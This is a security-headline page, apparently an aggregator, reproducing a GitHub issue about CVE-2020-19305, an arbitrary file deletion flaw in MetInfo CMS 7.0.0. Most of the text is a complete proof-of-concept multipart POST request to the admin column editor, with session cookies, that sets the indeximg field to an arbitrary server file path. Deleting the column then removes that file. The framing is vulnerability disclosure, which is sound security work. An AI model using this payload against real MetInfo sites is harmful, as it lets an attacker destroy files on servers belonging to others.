Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-19305: MetInfo 7.0.0 Arbitrary File Deletion · Issue #2 · MRdoulestar/CodeAnalyse

An issue in /app/system/column/admin/index.class.php of Metinfo v7.0.0 causes the indeximg parameter to be deleted when the column is deleted, allowing attackers to escalate privileges.

CVE
#vulnerability#mac#windows#js#java#intel#php#auth#ssh#firefox

Vulnerability Name: Metinfo CMS Arbitrary File Deletion
Product Homepage: https://www.metinfo.cn/
Software link: https://u.mituo.cn/api/metinfo/download/7.0.0
Version: V7.0.0

The indeximg field is also deleted when the column is deleted in /app/system/column/admin/index.class.php: _delolumn and fileUnlink, and the indeximg field can be arbitrarily specified by the background user (in the function of adding a column picture).

POC

POST /admin/?n=column&c=index&a=doEditorsave HTTP/1.1 Host: 10.211.55.6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------172210677418114399992143883321 Content-Length: 3178 Connection: keep-alive Referer: http://10.211.55.6/admin/ Cookie: PHPSESSID=268e9201bb4e347895ac2ac5afeb8334; Hm_lvt_520556228c0113270c0c772027905838=1578917132; Hm_lpvt_520556228c0113270c0c772027905838=1579013418; acc_auth=d9568Kwur%2Bv8GLHxl79ulL1w7lquML1KYclY%2FCd%2B9FMDQX9PAipAvJcX%2Bi5%2FFeRikywpRqDjIPMKsqnOnn9d2eQp; acc_key=RyFT5Up; arrlanguage=metinfo; re_url=http%3A%2F%2F_%2Fadmin%2F; met_auth=d751CuV3bOuwwoDzPcjuuPhQpMwDEBbdmRWy6IhPJrRO8ZfjbtwsJWPini3%2BIk0dwT9jmdCr0i4dyZ6TT0x84aIP; met_key=IMnix8E; admin_lang=cn; page_iframe_url=http://10.211.55.6/index.php?lang=cn&pageset=1

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="id"

79 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="wap_ok"

0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="no_order"

0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="name"

yunsle -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="text_size"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="text_color"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="nav"

0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="new_windows"

0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="isshow"

1 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="ctitle"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="keywords"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="description"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="filename"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="index_num"

0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="namemark"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="indeximg"; filename="" Content-Type: application/octet-stream

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="indeximg"

/var/www/metinfo/this_is_test.php -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="columnimg"; filename="" Content-Type: application/octet-stream

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="columnimg"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="icon"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="other_info"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="custom_info"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="access"

0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="display"

0 -----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="nofollow"

-----------------------------172210677418114399992143883321 Content-Disposition: form-data; name="submit_type"

save -----------------------------172210677418114399992143883321–

Then we delete the column, and the file will be deleted as well.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907